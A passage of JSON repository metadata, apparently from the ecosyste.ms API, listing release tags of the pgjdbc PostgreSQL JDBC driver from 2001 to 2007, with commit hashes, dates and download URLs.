2007-12-02T08:30:31.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_2_507","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_2_507","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_2_507","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_507","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_507/manifests"},{"name":"REL8_0_320","sha":"a72e305c0133dd8b962ab06cb991b44927317dd9","kind":"commit","published_at":"2007-07-31T06:07:02.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_320","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_320","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_320","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_320","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_320/manifests"},{"name":"REL8_1_410","sha":"5619f9ef751da6bfa6b619cf62716bb315f7eba8","kind":"commit","published_at":"2007-07-31T06:06:35.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_410","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_410","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_410","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_410","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_410/manifests"},{"name":"REL8_2_506","sha":"12eceb1ff7a04d25bf74bda80a59f37ac53110a3","kind":"commit","published_at":"2007-07-31T06:06:12.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_2_506","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_2_506","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_2_506","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_506","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_506/manifests"},{"name":"REL8_2_505","sha":"91879290313ab6f64e05f9f366c368dc8419516c","kind":"commit","published_at":"2007-04-18T08:15:18.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_2_505","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_2_505","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_2_505","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_505","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_505/manifests"},{"name":"REL8_1_409","sha":"ef22d89fe798811a7ac7a143b0620043eb0acd00","kind":"commit","published_at":"2007-04-18T08:14:29.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_409","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_409","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_409","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_409","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_409/manifests"},{"name":"REL8_0_319","sha":"859fe40b52d5e8c44184c19015bd1836478c7355","kind":"commit","published_at":"2007-04-18T08:13:26.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_319","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_319","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_319","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_319","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_319/manifests"},{"name":"REL8_2_504","sha":"80b0ce1be968813de3d56ff1670857015ce6862f","kind":"commit","published_at":"2006-12-01T12:02:39.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_2_504","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_2_504","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_2_504","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_504","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_504/manifests"},{"name":"REL8_1_408","sha":"db52e0e583a7b8af7c7d5da34f50c8f965baec6f","kind":"commit","published_at":"2006-12-01T11:57:03.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_408","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_408","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_408","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_408","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_408/manifests"},{"name":"REL8_0_318","sha":"50466b1014fd76ec445abe26b234c13dc7c0f338","kind":"commit","published_at":"2006-12-01T11:54:54.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_318","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_318","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_318","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_318","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_318/manifests"},{"name":"REL8_0_317","sha":"7bab436cbec9baec3cd36c6d320cdc4402fd718c","kind":"commit","published_at":"2006-05-23T23:07:39.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_317","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_317","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_317","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_317","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_317/manifests"},{"name":"REL8_1_407","sha":"d9e844e0f120b4401e178392c6d4293ac5e7d3cd","kind":"commit","published_at":"2006-05-23T23:07:09.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_407","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_407","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_407","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_407","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_407/manifests"},{"name":"REL8_0_316","sha":"027669dc50a5266603367853ba6a5a9e5fba91bd","kind":"commit","published_at":"2006-05-22T10:08:50.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_316","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_316","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_316","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_316","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_316/manifests"},{"name":"REL8_1_406","sha":"6b082944901866105f620900867a0e7eb8b96d91","kind":"commit","published_at":"2006-05-22T10:08:35.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_406","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_406","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_406","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_406","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_406/manifests"},{"name":"REL8_1_405","sha":"5dbd05a49a9c17f00528d7c8d885cfdeaacf3ad9","kind":"commit","published_at":"2006-02-09T17:04:38.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_405","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_405","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_405","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_405","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_405/manifests"},{"name":"REL8_0_315","sha":"90ed05f956d7269066a591086d9431191affa7bb","kind":"commit","published_at":"2006-02-09T17:04:06.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_315","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_315","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_315","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_315","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_315/manifests"},{"name":"REL8_1_404","sha":"d3f28b54df40c3eae08305d51d0219c689de4797","kind":"commit","published_at":"2005-11-06T06:45:13.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_404","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_404","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_404","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_404","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_404/manifests"},{"name":"REL8_0_314","sha":"5f21e4fa065eeb8719ff8f0ce593c9337f9d0335","kind":"commit","published_at":"2005-11-06T06:41:45.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_314","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_314","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_314","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_314","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_314/manifests"},{"name":"REL8_0_313","sha":"9cac940139c5c0f95a18199600309ed276daf0d5","kind":"commit","published_at":"2005-10-07T06:08:40.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_313","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_313","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_313","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_313","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_313/manifests"},{"name":"REL8_0_312","sha":"3ae53db8d3ca58443540e6e371e14027d3d85a0b","kind":"commit","published_at":"2005-07-24T11:05:11.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_312","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_312","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_312","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_312","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_312/manifests"},{"name":"REL8_0_311","sha":"ac526695a77433ceea00e1f8b4a9ba710607d2f2","kind":"commit","published_at":"2005-04-11T04:45:13.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_311","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_311","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_311","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_311","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_311/manifests"},{"name":"REL8_0_310","sha":"29a41dac2a3025af1d759924fcbd688cd9c8ee25","kind":"commit","published_at":"2005-02-02T20:08:22.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_310","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_310","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_310","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_310","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_310/manifests"},{"name":"REL8_0_309","sha":"389b1a118b97418bd72ef30e4e6534d5987faa60","kind":"commit","published_at":"2005-01-17T11:09:41.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_309","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_309","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_309","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_309","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_309/manifests"},{"name":"REL7_4_1","sha":"2d3f36805608aa2a41d3fc85c7bc0c1e43dfb0b3","kind":"commit","published_at":"2003-12-18T04:18:15.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_4_1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_4_1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_4_1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_1/manifests"},{"name":"REL7_4","sha":"76a1ece07b1d3f4110d6522ce7eaf9c382316125","kind":"commit","published_at":"2003-11-15T10:20:02.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4/manifests"},{"name":"REL7_4_RC2","sha":"00f63c8f0632ef0539d0cf0e6ac1f7ad00d28574","kind":"commit","published_at":"2003-10-30T12:18:56.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_4_RC2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_4_RC2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_4_RC2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_RC2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_RC2/manifests"},{"name":"REL7_4_RC1","sha":"00f63c8f0632ef0539d0cf0e6ac1f7ad00d28574","kind":"commit","published_at":"2003-10-30T12:18:56.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_4_RC1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_4_RC1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_4_RC1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_RC1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_RC1/manifests"},{"name":"REL7_4_BETA5","sha":"8115d542320a2c6cccb5e28640991b3bd6107ad6","kind":"commit","published_at":"2003-10-15T09:39:04.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_4_BETA5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_4_BETA5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_4_BETA5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_BETA5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_BETA5/manifests"},{"name":"REL7_4_BETA4","sha":"67fffc6579b15aadb6567cdad3d7b07360f37912","kind":"commit","published_at":"2003-09-23T06:13:52.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_4_BETA4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_4_BETA4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_4_BETA4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_BETA4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_BETA4/manifests"},{"name":"REL7_4_BETA3","sha":"3f65d0b145f09a2f9ed09f53500f63efde8eb3f4","kind":"commit","published_at":"2003-09-13T04:02:16.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_4_BETA3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_4_BETA3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_4_BETA3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_BETA3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_BETA3/manifests"},{"name":"REL7_4_BETA2","sha":"7d4ef49d60406717eab1291c0cf6af65464e13bf","kind":"commit","published_at":"2003-08-26T06:50:39.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_4_BETA2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_4_BETA2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_4_BETA2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_BETA2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_BETA2/manifests"},{"name":"REL7_3_5","sha":"b7556b365129f5076b40e8721a0b0318d4fb5ac3","kind":"commit","published_at":"2003-08-07T17:56:27.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_3_5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_3_5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_3_5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_3_5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_3_5/manifests"},{"name":"REL7_4_BETA1","sha":"ad2546260b21f17f5ad096010f1a80790108f3cd","kind":"commit","published_at":"2003-07-24T00:30:39.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_4_BETA1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_4_BETA1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_4_BETA1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_BETA1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_BETA1/manifests"},{"name":"REL7_3_4","sha":"433b7b97da262eb863e59b29161f9691a7e624c8","kind":"commit","published_at":"2003-07-23T23:34:31.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_3_4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_3_4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_3_4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_3_4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_3_4/manifests"},{"name":"REL7_3_2","sha":"93d0ed7240e64ecfaaeb7e689594dc878125fd36","kind":"commit","published_at":"2003-01-14T09:40:48.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_3_2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_3_2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_3_2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_3_2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_3_2/manifests"},{"name":"REL7_2_4","sha":"f4cfb708fe309ef501e76713bc447f878c1dff79","kind":"commit","published_at":"2002-01-18T17:21:51.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_2_4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_2_4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_2_4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_4/manifests"},{"name":"REL7_2_3","sha":"f4cfb708fe309ef501e76713bc447f878c1dff79","kind":"commit","published_at":"2002-01-18T17:21:51.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_2_3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_2_3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_2_3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_3/manifests"},{"name":"REL7_2","sha":"f4cfb708fe309ef501e76713bc447f878c1dff79","kind":"commit","published_at":"2002-01-18T17:21:51.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2/manifests"},{"name":"REL7_2_RC2","sha":"f4cfb708fe309ef501e76713bc447f878c1dff79","kind":"commit","published_at":"2002-01-18T17:21:51.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_2_RC2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_2_RC2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_2_RC2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_RC2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_RC2/manifests"},{"name":"REL7_2_RC1","sha":"f4cfb708fe309ef501e76713bc447f878c1dff79","kind":"commit","published_at":"2002-01-18T17:21:51.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_2_RC1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_2_RC1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_2_RC1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_RC1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_RC1/manifests"},{"name":"REL7_2_BETA5","sha":"74b58ea9308a8d0afa06c4da53967eccbe10f955","kind":"commit","published_at":"2002-01-05T22:26:23.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_2_BETA5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_2_BETA5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_2_BETA5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_BETA5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_BETA5/manifests"},{"name":"REL7_2_BETA4","sha":"7b96aee64942e2b041820d2c8a6a95c8ac79dfdb","kind":"commit","published_at":"2001-12-11T04:48:05.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_2_BETA4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_2_BETA4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_2_BETA4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_BETA4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_BETA4/manifests"},{"name":"REL7_2_BETA3","sha":"855287de30b689e315b435f79f3b8fd066dd5ac8","kind":"commit","published_at":"2001-11-19T23:19:21.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_2_BETA3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_2_BETA3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg: